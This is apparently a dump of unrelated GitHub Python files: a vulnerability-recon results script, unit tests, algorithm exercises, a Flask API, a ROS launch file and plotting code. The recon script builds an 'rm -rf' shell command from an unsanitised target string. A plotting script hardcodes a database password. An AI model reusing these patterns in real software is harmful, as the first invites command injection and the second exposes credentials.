list_vulns):\n\t\t\t\t\t\t\tlist_vulns.append(x['_source']['vulnerability.name'])\n\t\t\t\t\t\t\twith open (homedir+'/recon/data/'+target+'/result.txt','a') as file:\n\t\t\t\t\t\t\t\tfile.write(x['_source']['url.full']+' - '+x['_source']['vulnerability.name']+'\\n')\n\t\t\texcept:\n\t\t\t\tpass\n\n\tconsulta_ip(ip)\n\ndef main():\n\tos.system('rm -rf '+homedir+'/recon/data/'+target+'/result.txt')\n\tconsulta_vuln()\n\twith open(homedir+'/recon/data/'+target+'/result.txt', 'r') as file:\n\t\tos.system('clear')\n\t\tdata = file.read()\n\t\tprint(data)\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"vida003/AutoRecon","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"73769420276","text":"\"\"\"\nUnit tests go here\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport pytest\nfrom pandas._testing import assert_frame_equal\n\nfrom spc.helpers import (\n flatten_list,\n get_df_with_sample_id,\n get_num_of_PCs_to_retain,\n multiply_matrices,\n standardize_and_PCA,\n)\n\n\ndef test_flatten_list():\n assert flatten_list([[1, 1], [2, 2], [3, 3]]) == [1, 1, 2, 2, 3, 3]\n assert flatten_list([[], []]) == []\n assert flatten_list([[]]) == []\n\n\ndef test_get_df_with_sample_id():\n df_test_input = pd.DataFrame({\"x1\": [1, 2, 2, 3, 3, 4, 5]})\n df_expected1 = pd.DataFrame(\n {\"sample_id\": [1, 2, 3, 4, 5, 6, 7], \"x1\": [1, 2, 2, 3, 3, 4, 5]}\n )\n df_expected2 = pd.DataFrame(\n {\"sample_id\": [1, 1, 2, 2, 3, 3, 4], \"x1\": [1, 2, 2, 3, 3, 4, 5]}\n )\n df_expected3 = pd.DataFrame(\n {\"sample_id\": [1, 1, 1, 1, 1, 1, 1], \"x1\": [1, 2, 2, 3, 3, 4, 5]}\n )\n df_output1 = get_df_with_sample_id(df_test_input, n_sample_size=1)\n df_output2 = get_df_with_sample_id(df_test_input, n_sample_size=2)\n df_output3 = get_df_with_sample_id(df_test_input, n_sample_size=7)\n\n assert_frame_equal(df_output1, df_expected1, check_dtype=False)\n assert_frame_equal(df_output2, df_expected2, check_dtype=False)\n assert_frame_equal(df_output3, df_expected3, check_dtype=False)\n with pytest.raises(Exception):\n get_df_with_sample_id(df_test_input, n_sample_size=0)\n\n\ndef test_multiply_matrices():\n sigma = np.array(\n [\n [1, 0.7, 0.9, 0.3, 0.2, 0.3],\n [0.7, 1, 0.8, 0.1, 0.4, 0.2],\n [0.9, 0.8, 1, 0.1, 0.2, 0.1],\n [0.3, 0.1, 0.1, 1, 0.2, 0.1],\n [0.2, 0.4, 0.2, 0.2, 1, 0.1],\n [0.3, 0.2, 0.1, 0.1, 0.1, 1],\n ]\n )\n delta_output = np.sqrt(\n multiply_matrices(np.array([1] * 6), np.linalg.inv(sigma), np.array([1] * 6))\n )\n delta_expected = 1.86\n assert np.round(delta_output, 2) == delta_expected\n\n\n@pytest.mark.parametrize(\n \"variance_explain_min, expected_num_of_PCs_to_retain\",\n [[0.1, 1], [0.55, 2], [0.9, 3], [0.95, 3]],\n)\ndef test_get_num_of_PCs_to_retain(\n dataframe_for_PCAModel_phase1, variance_explain_min, expected_num_of_PCs_to_retain\n):\n _, PCA_object, _ = standardize_and_PCA(df=dataframe_for_PCAModel_phase1)\n num_of_PCs_to_retain, _ = get_num_of_PCs_to_retain(\n PCA_object=PCA_object, PC_variance_explained_min=variance_explain_min\n )\n assert num_of_PCs_to_retain == expected_num_of_PCs_to_retain\n","repo_name":"hviidhenrik/SPC","sub_path":"tests/test_helpers.py","file_name":"test_helpers.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"4"} +{"seq_id":"28359882828","text":"n=int(input())\na=list(map(int,input().split()))\nb=max(a)\ni=1\nwhile True:\n c=0\n for j in a:\n if b*i%j==0:\n c+=1\n if c==len(a):\n print(b*i)\n break\n i+=1","repo_name":"Abhishekvaranasi07/codemind-python","sub_path":"LCM_of_n_numbers.py","file_name":"LCM_of_n_numbers.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"43541473494","text":"arr = [1, 2, 3]\nN = 3\n\nsel = [0] * N\n\n\ndef perm(idx, check):\n if idx == N:\n print(sel)\n return\n\n for i in range(N):\n if (check & (1 << i)) != 0:\n continue\n\n sel[idx] = arr[i]\n perm(idx + 1, check | (1 << i))\n\n\nperm(0, 0)\n","repo_name":"kimchaelin13/Algorithm","sub_path":"lesson/0901/순열_비트마스크.py","file_name":"순열_비트마스크.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"25147700030","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport mock\nimport os\nimport giit.python_environment\n\n\ndef test_python_environment(testdirectory):\n\n prompt = mock.Mock()\n virtual_environment = mock.Mock()\n log = mock.Mock()\n requirements = testdirectory.write_text(\n filename=\"requirements.txt\", data=\"sphinx\", encoding=\"utf-8\"\n )\n\n env = {\"PATH\": \"/oki/doki\"}\n virtual_environment.create_environment.side_effect = lambda name: env\n\n python_environment = giit.python_environment.PythonEnvironment(\n prompt=prompt, virtual_environment=virtual_environment, log=log\n )\n\n venv = python_environment.from_requirements(\n requirements=requirements, pip_packages=None\n )\n\n assert venv == env\n\n command = \"python -m pip install -U -r {}\".format(\n os.path.join(testdirectory.path(), \"requirements.txt\")\n )\n prompt.run.assert_called_once_with(command=command, env=env)\n","repo_name":"steinwurf/giit","sub_path":"test/test_python_environment.py","file_name":"test_python_environment.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"7551086400","text":"def read_data(filename: str) -> list[int]:\n with open(filename) as file:\n n = int(file.readline())\n data = [0] * 10_000_000\n for _ in range(n):\n key, val = map(int, file.readline().strip().split())\n data[key] = val\n return data\n\n\ndef solution(data: list[int]) -> int:\n data = list(map(lambda x: x // 48 + int(x % 48 != 0), data))\n ans = 100 ** 100\n sm = sum(data)\n c = 0\n for i in range(1, len(data)):\n c += data[i] * i\n b = data[0]\n for i in range(1, len(data)):\n c += 2 * b - sm\n if data[i] != 0:\n ans = min(ans, c)\n b += data[i]\n return ans\n\n\nprint(solution(read_data('27A.txt')), end=' ')\nprint(solution(read_data('27B.txt')))\n","repo_name":"vlad-marlo/algorithms","sub_path":"school/ege/vars/25021990/27.py","file_name":"27.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"28380243287","text":"from flask import Flask\nfrom flask_restful import Api, reqparse\nfrom flask_swagger_ui import get_swaggerui_blueprint\nfrom app.routes.hello_world import HelloWorld\nfrom app.routes.random_message import RandomMessage\n\napp = Flask(__name__)\napi = Api(app)\nprefix=\"/api/v1\"\nparser = reqparse.RequestParser()\n\n### swagger specific ###\nSWAGGER_URL = '/swagger'\nAPI_URL = '/static/swagger.json'\nSWAGGERUI_BLUEPRINT = get_swaggerui_blueprint(\n SWAGGER_URL,\n API_URL,\n config={\n 'app_name': \"Example REST API\"\n }\n)\n\napp.register_blueprint(SWAGGERUI_BLUEPRINT, url_prefix=SWAGGER_URL)\n\napi.add_resource(HelloWorld, prefix + '/hello-world')\napi.add_resource(RandomMessage, prefix + '/message')\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"rodrigomkd/example-rest-api","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"74005309237","text":"\"\"\" This function calculates de Omega matrix in Caliendo - Parro (2009)\n Inputs are A = alphas, B = bethas, G = I-O matrix, Dinp = trade shares,\n tarifap = tarifs, Fp = trade weighted tariffs \"\"\"\n\nimport numpy as np\nfrom numpy.linalg import matrix_power\n\n\ndef Expenditure(alphas, B, G, Dinp, taup, Fp, VAn, wf0, Sn, J, N):\n\n # [J, N] = np.shape(A)\n IA = np.zeros((J * N, J * N))\n I_F = 1 - Fp\n\n for n in range(N):\n IA[n * J: (n + 1) * J, n * J: (n + 1) * J] = np.kron(alphas[:, n], I_F[:, n].T).reshape(40, 40)\n\n Pit = Dinp/taup\n Bt = 1 - B\n BP = np.zeros(np.shape(Pit))\n\n for j in range(J):\n BP[j * N: (j + 1) * N, :] = np.kron(np.ones(N).reshape(N, 1), Bt[j, :]) * Pit[j * N: (j + 1) * N, :]\n\n NBP = np.zeros(np.shape(BP.T))\n\n for j in range(N):\n for n in range(N):\n NBP[j, n * J: (n + 1) * J] = BP[np.arange(n, N, J * N), j]\n\n NNBP = np.kron(NBP, np.ones((J, 1)))\n GG = np.kron(np.ones((1, N)), G)\n GP = GG * NNBP\n\n OM = np.eye(J * N, J * N) - (GP + IA)\n Vb = alphas * np.kron(np.ones((J, 1)), (wf0 * VAn).T)\n Vb = Vb.reshape(J * N, 1, order='F').copy()\n Bb = -alphas * (Sn * np.ones((1, J))).T\n Bb = Bb.reshape(J * N, 1, order='F').copy()\n\n temp = matrix_power(OM, -1)\n DD1 = temp.dot(Vb)\n DD2 = temp.dot(Bb)\n PQ = DD1 + DD2\n PQ = PQ.reshape(J, N, order='F').copy()\n\n return PQ\n","repo_name":"BAFurtado/AberturaComercial","sub_path":"expenditure.py","file_name":"expenditure.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"9200570345","text":"import os\n\nfrom ament_index_python.packages import get_package_share_directory\nfrom launch import LaunchDescription\nfrom launch.actions import IncludeLaunchDescription\nfrom launch.launch_description_sources import PythonLaunchDescriptionSource\nfrom launch.substitutions import LaunchConfiguration\n\nfrom pysdf import SDF\nimport numpy as np\nimport random\n\nclass SelectRandomPose:\n\n def __init__(self, \n sdl_path, \n min_x,\n min_y,\n max_x,\n max_y): \n\n self.parsed_sdl = SDF.from_file(sdl_path, remove_blank_text=True)\n self.parsed_sdl.to_file(sdl_path, pretty_print=True)\n self.objects_to_ignore = [\"head\", \"left_hand\", \"right_hand\", \"left_foot\", \"right_foot\", \"body\"]\n self.cylinder_radius = 0.2\n self.min_x = min_x\n self.min_y = min_y\n self.max_x = max_x\n self.max_y = max_y\n\n def __cylinder_detect(self):\n self.cylinder_poses = []\n for visual in self.parsed_sdl.iter(\"visual\"):\n if visual.name not in self.objects_to_ignore:\n pose = np.fromstring(visual.pose.text, count=6, sep=\" \")\n self.cylinder_poses.append(pose)\n\n def get_random_pose(self):\n self.__cylinder_detect()\n while True:\n x = random.uniform(self.min_x, self.max_x)\n y = random.uniform(self.min_y, self.max_y)\n self.pose = np.array([x, y])\n self.valid_pose_x_list = []\n self.valid_pose_y_list = []\n\n for cylinder_pose in self.cylinder_poses:\n valid_pose_x = not cylinder_pose[0] - self.cylinder_radius < self.pose[0] < cylinder_pose[0] + self.cylinder_radius \n valid_pose_y = not cylinder_pose[1] - self.cylinder_radius < self.pose[1] < cylinder_pose[1] + self.cylinder_radius \n self.valid_pose_x_list.append(valid_pose_x)\n self.valid_pose_y_list.append(valid_pose_y)\n\n if False not in self.valid_pose_x_list and False not in self.valid_pose_y_list: \n return self.pose\n\n\ndef generate_launch_description():\n launch_file_dir = os.path.join(get_package_share_directory('turtlebot3_gazebo'), 'launch')\n pkg_gazebo_ros = get_package_share_directory('gazebo_ros')\n\n world = random.randint(1, 4)\n\n path_sdf_model = f\"~/../../opt/ros/humble/share/turtlebot3_gazebo/models/g2w{world}/model.sdf\"\n path_sdf_model = os.path.expanduser(path_sdf_model)\n selectRandomPose = SelectRandomPose(sdl_path = path_sdf_model, \n min_x = -1.3,\n min_y = -1.5,\n max_x = 2.0,\n max_y = 1.5)\n \n pose = selectRandomPose.get_random_pose() \n\n \n\n use_sim_time = LaunchConfiguration('use_sim_time', default='true')\n x_pose = LaunchConfiguration('x_pose', default=f'{pose[0]}')\n y_pose = LaunchConfiguration('y_pose', default=f'{pose[1]}')\n \n\n if world == 1: \n world = os.path.join(\n get_package_share_directory('turtlebot3_gazebo'),\n 'worlds',\n 'g2w1.world'\n ) \n elif world == 2: \n world = os.path.join(\n get_package_share_directory('turtlebot3_gazebo'),\n 'worlds',\n 'g2w2.world'\n ) \n elif world == 3: \n world = os.path.join(\n get_package_share_directory('turtlebot3_gazebo'),\n 'worlds',\n 'g2w3.world'\n ) \n elif world == 4: \n world = os.path.join(\n get_package_share_directory('turtlebot3_gazebo'),\n 'worlds',\n 'g2w4.world'\n ) \n\n gzserver_cmd = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(\n os.path.join(pkg_gazebo_ros, 'launch', 'gzserver.launch.py')\n ),\n launch_arguments={'world': world}.items()\n )\n\n gzclient_cmd = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(\n os.path.join(pkg_gazebo_ros, 'launch', 'gzclient.launch.py')\n )\n )\n\n robot_state_publisher_cmd = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(\n os.path.join(launch_file_dir, 'robot_state_publisher.launch.py')\n ),\n launch_arguments={'use_sim_time': use_sim_time}.items()\n )\n\n spawn_turtlebot_cmd = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(\n os.path.join(launch_file_dir, 'spawn_turtlebot3.launch.py')\n ),\n launch_arguments={\n 'x_pose': f'{pose[0]}',\n 'y_pose': f'{pose[1]}',\n }.items()\n )\n\n ld = LaunchDescription()\n\n # Add the commands to the launch description\n ld.add_action(gzserver_cmd)\n ld.add_action(gzclient_cmd)\n ld.add_action(robot_state_publisher_cmd)\n ld.add_action(spawn_turtlebot_cmd)\n\n return ld\n","repo_name":"autonomous-robots/worlds_gazebo","sub_path":"launch/turtlebot3_world.launch.py","file_name":"turtlebot3_world.launch.py","file_ext":"py","file_size_in_byte":4944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"41138375440","text":"import psycopg2 as psycopg2\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nsns.set_theme(style=\"whitegrid\")\nimg_path = '/Users/tim/master-thesis/latex/img/experiments/'\n# sns.set(rc = {'figure.figsize':(11,8)})\nalgorithms_order = ['Seeded DynaMOSA', 'DynaMOSA', 'Seeded Random Search', 'Random Search']\ncrates_order = ['time', 'gamie', 'lsd', 'humantime', 'quick_xml', 'tight']\n\nwith psycopg2.connect(\"dbname=rustyunit user=rust password=Lz780231Ray\") as conn:\n sql_seeded_random = \"select * from experiments_seeded_random;\"\n seeded_random_data = pd.read_sql_query(sql_seeded_random, conn)\n seeded_random_data['Algorithm'] = 'Seeded Random Search'\n seeded_random_data = seeded_random_data[seeded_random_data['crate'] != 'toycrate']\n\n sql_random = \"select * from experiments_random;\"\n random_data = pd.read_sql_query(sql_random, conn)\n random_data['Algorithm'] = 'Random Search'\n random_data = random_data[random_data['crate'] != 'toycrate']\n\n sql_seeded_dynamosa = \"select * from experiments_seeded_dynamosa;\"\n seeded_dynamosa_data = pd.read_sql_query(sql_seeded_dynamosa, conn)\n seeded_dynamosa_data['Algorithm'] = 'Seeded DynaMOSA'\n seeded_dynamosa_data = seeded_dynamosa_data[seeded_dynamosa_data['crate'] != 'toycrate']\n\n sql_dynamosa = \"select * from experiments_dynamosa;\"\n dynamosa_data = pd.read_sql_query(sql_dynamosa, conn)\n dynamosa_data['Algorithm'] = 'DynaMOSA'\n dynamosa_data = dynamosa_data[dynamosa_data['crate'] != 'toycrate']\n\n data = pd.concat([seeded_random_data, random_data, seeded_dynamosa_data, dynamosa_data])\n\n plot_data = data.groupby(['Algorithm', 'gen']).mean()\n fig = plt.figure(1)\n # mir_coverage, tests_length, tests, covered_targets\n\n coverage_plot = sns.lineplot(x=\"gen\", y=\"mir_coverage\",\n hue=\"Algorithm\", # style=\"event\",\n data=plot_data, hue_order=algorithms_order)\n coverage_plot.get_legend().set_title(None)\n coverage_plot.set(xlabel=\"Generation\", ylabel=\"Basic block coverage\")\n plt.show()\n fig.savefig(img_path + 'coverage-over-time-crates.png', dpi=300, format='png', bbox_inches='tight')\n","repo_name":"foxycom/rusty-unit","sub_path":"experiments/coverage_lineplot.py","file_name":"coverage_lineplot.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"4"} +{"seq_id":"75183676917","text":"# Написать класс Vect, унаследованный от list, со следующими изменениями:\r\n# ◦\tПри создании экземпляра должно проверяться, что\r\n# 1\tВсе элементы последовательности одного типа\r\n# 2\tЭтот тип поддерживает сложение и умножение на число\r\n# ◦\tВ противном случае возникает исключение Type Error\r\n# ◦\tКласс поддерживает поэлементное умножение на число: vect @ 5\r\n# ◦\tКласс поддерживает поэлементное сложение (вместо конкатенации): vect1 + vect2\r\n# ◦\tКласс поддерживает запись в файл vect.write(\"файл\") и чтение из файла vect.read(\"файл\") (имя файла любое)\r\n# ◦\tПример:\r\n#\r\n# 1 >>> v, w = Vect(range(9)), Vect(range(10,16))\r\n# 2 >>> v, w\r\n# 3 ([0, 1, 2, 3, 4, 5, 6, 7, 8], [10, 11, 12, 13, 14, 15])\r\n# 4 >>> v+w\r\n# 5 [10, 12, 14, 16, 18, 20]\r\n# 6 >>> v@3\r\n# 7 [0, 3, 6, 9, 12, 15, 18, 21, 24]\r\n# 8 >>> s = Vect(\"QWER\")\r\n# 9 >>> s\r\n# 10 ['Q', 'W', 'E', 'R']\r\n# 11 >>> s+\"ASDFG\"\r\n# 12 ['QA', 'WS', 'ED', 'RF']\r\n# 13 >>> s@4\r\n# 14 ['QQQQ', 'WWWW', 'EEEE', 'RRRR']\r\n# 15 >>> l = Vect(i*2+1 for i in range(6))\r\n# 16 >>> l\r\n# 17 [1, 3, 5, 7, 9, 11]\r\n# 18 >>> e = Vect((1,2,3,4.4,5,6))\r\n\r\nclass Vect(list):\r\n def __add__(self, other):\r\n sum = Vect()\r\n size = min(len(self), len(other))\r\n for i in range(size):\r\n sum.append(other[i] + self[i])\r\n return sum\r\n\r\n def __mul__(self, other):\r\n for i in range(len(self)):\r\n self[i] *= other\r\n return self\r\n\r\n def write(self, path):\r\n output = open(path, 'w')\r\n output.write(str(self))\r\n\r\n def read(self, path):\r\n input = open(path, 'r')\r\n str = input.read()\r\n lst = list(eval(str))\r\n self.clear()\r\n for i in range(len(lst)):\r\n self.append(lst[i])\r\nv = Vect(range(9))\r\n# v.write('output1.txt')\r\nv.read('output1.txt')\r\nprint('bye')\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"cryptoEcho/MSU_python2021","sub_path":"04.24_2.py","file_name":"04.24_2.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"13833223632","text":"def longest_valid(s):\n match = [0] * (len(s) + 1)\n for i in range(1, len(s)):\n if s[i] in '{':\n continue\n open = '{'['}'.index(s[i])]\n start = i - 1 - match[i - 1]\n if start < 0:\n continue\n if s[start] != open:\n continue\n match[i] = i - start + 1 + match[start - 1]\n best = max(match)\n end = match.index(best)\n return s[end + 1 - best:end + 1]\n\n\nprint(len(longest_valid(input())))\n\nt = int(input())\npoint = []\nfor i in range(t):\n point.append(list(map(int, input().split())))\n","repo_name":"lalit21-logico/programming","sub_path":"brac.py","file_name":"brac.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"24849543033","text":"while True:\r\n try:\r\n N = int(input('Введите N: '))\r\n if 1<=N<=1000: break\r\n print('1≤N≤1000 !')\r\n except:\r\n print('Неверный ввод!')\r\n\r\nсловарь = {k[0]:' '.join(k[1:]) for k in [input(f'Введите {i+1}-ю запись: ').split() for i in range(N)]}\r\n\r\nwhile True:\r\n try:\r\n M = int(input('Введите M: '))\r\n if 1<=M<=100: break\r\n print('1≤M≤100 !')\r\n except:\r\n print('Неверный ввод!')\r\n\r\nслова = [input(f'Введите {i+1}-е слово: ') for i in range(M)]\r\n\r\n[print(f'{i}:', словарь. setdefault(i,'Нет в словаре')) for i in слова]","repo_name":"Irina-Sinyukova/PY2","sub_path":"PY/Ddictionary.py","file_name":"Ddictionary.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"42506501283","text":"#!/usr/bin/evn python2.7\n# -*- coding: utf-8 -*-\n\"\"\"\n特征向量制作\n\n\"\"\"\nimport tldextract\nimport numpy as np\n\nfrom get_lexical import UrlLexical\nfrom get_whois import extract_feature_whois\nfrom get_rank import get_scheme_domain\n\n\nclass build_feature(object):\n def __init__(self, data_obj, url_ip_map, url_ip_dmap, pdomain_whois_map, domain_rank_map, domain_cert_map, \\\n domain_pr_map, sus_domain):\n self.data_obj = data_obj\n self.url_ip_map = url_ip_map\n self.url_ip_dmap = url_ip_dmap\n self.pdomain_whois_map = pdomain_whois_map\n self.domain_rank_map = domain_rank_map\n self.domain_cert_map = domain_cert_map\n self.domain_pr_map = domain_pr_map\n self.sus_domain = sus_domain\n\n def __getkey(self, url):\n # 获取词汇特征\n lex_obj = UrlLexical(url)\n filename, filepath, pdomain_token, sdomain_token = lex_obj.do_extract()\n\n # 获取rank\n scheme_domain = get_scheme_domain(url)\n rank = self.domain_rank_map.get(scheme_domain, None)\n\n # 获取whois信息\n whois_obj = extract_feature_whois(url, self.pdomain_whois_map)\n exp_timedelta = whois_obj.get_exp_timedelta()\n reg_timedelta = whois_obj.get_reg_timedelta()\n upd_timedelta = whois_obj.get_update_timedelta()\n timedelta = whois_obj.get_timedelta()\n registrar = whois_obj.get_registrar()\n\n # 获取pdomain\n tld_obj = tldextract.extract(lex_obj.url_domain)\n url_pdomain = \".\".join([tld_obj.domain, tld_obj.suffix])\n url_domain = lex_obj.url_domain\n url_path = lex_obj.url_path\n url_netloc = lex_obj.url_netloc\n\n return filename, filepath, pdomain_token, sdomain_token, rank, exp_timedelta, reg_timedelta, upd_timedelta,\\\n timedelta, registrar, url_pdomain, url_domain, url_path, url_netloc\n\n def build_feature(self, url):\n \"\"\"\n :param url:\n :return:\n \"\"\"\n filename, filepath, pdomain_token, sdomain_token, rank, exp_timedelta, reg_timedelta, upd_timedelta,\\\n timedelta, registrar, url_pdomain, url_domain, url_path, url_netloc = self.__getkey(url)\n\n feature = np.zeros((1, 30), dtype=np.float32)\n\n # feature 1: domain path length\n if url_domain in self.data_obj.domain_path_map:\n feature[0][0] = len(self.data_obj.domain_path_map[url_domain])\n \n # feature 2: filename\n if filename and filename in self.data_obj.mal_filename:\n feature[0][1] = 1\n \n# if filename and filename in self.data_obj.ben_filename:\n# feature[0][2] = 1\n\n # feature 3: filepath\n if filepath and filepath in self.data_obj.mal_filepath:\n feature[0][3] = 1\n \n# if filename and filename in self.data_obj.ben_filepath:\n# feature[0][4] = 1\n\n # feature 4: domain tokens\n for token in pdomain_token:\n if token in self.data_obj.mal_pdomain_tokens:\n feature[0][5] = 1\n if token in self.data_obj.ben_pdomain_tokens:\n feature[0][7] = 1\n\n for token in sdomain_token:\n if token in self.data_obj.mal_sdomain_tokens:\n feature[0][6] = 1\n if token in self.data_obj.ben_sdomain_tokens:\n feature[0][8] = 1\n\n # feature 5: ip\n if url in self.url_ip_map and self.url_ip_map[url].rsplit(\".\", 1)[0] in self.data_obj.mal_ips:\n feature[0][9] += 1\n\n # feature 6: regisration time\n if reg_timedelta is not None:\n feature[0][10] = reg_timedelta\n\n # feature 7 reg exp time\n if timedelta is not None:\n feature[0][11] = timedelta\n\n # feature 8: update time\n if upd_timedelta is not None:\n feature[0][12] = upd_timedelta\n\n # feature 9 rank:\n if rank is None or rank > 10000000:\n feature[0][13] = 1\n\n if rank is not None and rank < 100000:\n feature[0][14] = 1\n\n # feature 10 cert:\n if url_domain in self.domain_cert_map and not isinstance(self.domain_cert_map[url_domain], int):\n feature[0][15] = 1\n\n # feature 11 maltrail:\n if url_domain in self.sus_domain:\n feature[0][16] = 1\n\n # feature 12 port num\n if url_pdomain in self.data_obj.domain_port_map:\n feature[0][17] = len(self.data_obj.domain_port_map[url_pdomain])\n\n # feature 15-17 filename lexical\n if filename and filename.count(\"%\") / float(len(filename)) > 0.2 and filename[-3:] == \"exe\":\n feature[0][18] = 1\n\n if filename and filename.count(\"@\") > 0:\n feature[0][19] = 1\n\n # feature 19 path level count\n if url_path:\n feature[0][20] = url_path.count(\"/\")\n\n # feature 20-21\n if url_domain in self.url_ip_dmap:\n feature[0][21] = len(self.url_ip_dmap[url_domain][1])\n feature[0][22] = len(self.url_ip_dmap[url_domain][2])\n\n if url_domain:\n for char in url_domain:\n if char.isdigit():\n feature[0][23] += 1\n\n feature[0][24] = len(url_domain) / url_domain.count(\".\")\n feature[0][25] = max([len(_) for _ in url_domain.split(\".\")])\n\n # feature 22 name servers count\n if url_pdomain in self.pdomain_whois_map and 'name_servers' in self.pdomain_whois_map and \\\n self.pdomain_whois_map[url_pdomain]['name_servers']:\n feature[0][26] = len(self.pdomain_whois_map[url_pdomain]['name_servers'])\n\n if url_pdomain in self.pdomain_whois_map and 'status' in self.pdomain_whois_map and \\\n self.pdomain_whois_map[url_pdomain]['status']:\n feature[0][27] = len(self.pdomain_whois_map[url_pdomain]['status'])\n\n if url_domain in self.domain_pr_map and self.domain_pr_map[url_domain] > 0:\n feature[0][28] = 1\n\n# deep digger into geo info\n\n# if domain in url_ip_dmap:\n# asn_set = set()\n# ips = url_ip_dmap[domain][2]\n# for ip in ips:\n# asn_set.add(asndb.asn_by_addr(ip))\n# feature[0][25] = len(asn_set)\n\n# if domain in url_ip_dmap:\n# geo_set = set()\n# ips = url_ip_dmap[domain][2]\n# for ip in ips:\n# if citydb.record_by_name(ip):\n# geo_set.add(citydb.record_by_name(ip)['city'])\n# feature[0][26] = len(geo_set)\n\n# feature filename\n\n# if filename:\n# feature[0][29] = filename.count(\"_\")\n\n# feature whois emails\n\n# if pdomain in whois_dict and 'emails' in whois_dict and whois_dict[pdomain]['emails']:\n# feature[0][23] = len(whois_dict[pdomain]['emails'])\n\n# feature whois country\n\n# if pdomain in whois_dict and 'country' in whois_dict and whois_dict[pdomain]['country']!=\"CN\":\n# feature[0][23] = 1\n\n# feature registrar\n\n# vector_obj = HashingVectorizer(n_features=64)\n# if registrar:\n# ff_add = vector_obj.fit_transform([registrar]).toarray()\n# else:\n# ff_add = np.zeros((1, 64), dtype = np.float32)\n# feature = np.concatenate((feature, ff_add), axis = 1)\n\n# feature asn ratio\n\n# if url in url_ip_map and url_ip_map[url] !='unknown':\n# asn = asndb.lookup(url_ip_map[url])[0]\n# if asn is not None and asn in asn_score_map:\n# feature[0][22] = asn_score_map[asn]\n\n return feature\n\n\n def build_feature_set(self, urls):\n feature = []\n for url in urls:\n feature.append(self.build_feature(url))\n feature = np.concatenate(feature, axis=0)\n return feature","repo_name":"angelfish91/URL-XGB","sub_path":"make_feature.py","file_name":"make_feature.py","file_ext":"py","file_size_in_byte":7952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"2325691455","text":"def group_values_by_indices(values, indices):\n groups = {}\n for value, index in zip(values, indices):\n if index not in groups:\n groups[index] = []\n groups[index].append(value)\n\n # Sort the dictionary by its keys and return the values\n return [groups[key] for key in sorted(groups)]\n\n\n# Example usage\nvalues = [1, 2, 3, 4, 5, 6, 7, 8]\nindices = [3, 3, 1, 1, 2, 2, 2, 4]\nprint(group_values_by_indices(values, indices))","repo_name":"jidec/bigcrittercolor","sub_path":"tests/scratch_experiments/group_by_indices.py","file_name":"group_by_indices.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"28958375553","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\n\nclass MapVisualizer:\n def __init__(self,size_meters,pixels):\n # size_meters: estimated map size, e.g. 10m x 10m\n # pixels: map matrix size, e.g. [1000,1000]\n self.size_meters=size_meters\n self.pixels=pixels\n self.resolution=size_meters/pixels\n self.vehicle=None\n self.img=None\n self.previous_X = [-1, -1]\n self.setlabels()\n\n def setlabels(self):\n fig=plt.figure(figsize=(7,7))\n mng = plt.get_current_fig_manager()\n plt.ion()\n self.ax = fig.gca()\n self.ax.set_xlabel('X (m)')\n self.ax.set_ylabel('Y (m)')\n self.ax.grid(False)\n plt.title('GMAPPING')\n # self.ax.set_xlim([0, self.pixels])\n self.ax.set_ylim([0, self.pixels])\n ticks=np.arange(0,self.size_meters+1)\n labels = [str(tick) for tick in ticks]\n self.ax.set_xticks(ticks/self.resolution)\n self.ax.set_yticks(ticks/self.resolution)\n self.ax.set_xticklabels(labels)\n self.ax.set_yticklabels(labels)\n\n def visualize(self,X,map_matrix):\n # X: [x,y,theta]\n # map_matrix: same as hw1\n\n # If pre-processing on input values is needed:(from hw1)\n # map_matrix[map_matrix < 0] = -1\n # map_matrix[map_matrix > 0] = 1 - map_matrix[map_matrix > 0]\n\n if self.vehicle:\n self.vehicle.remove()\n self.vehicle=self.ax.arrow(X[0]/self.resolution, X[1]/self.resolution,\n 0.1*np.cos(X[2]), 0.1*np.sin(X[2]), head_width=2, fc='r', ec='r')\n if (self.previous_X[0] != -1):\n 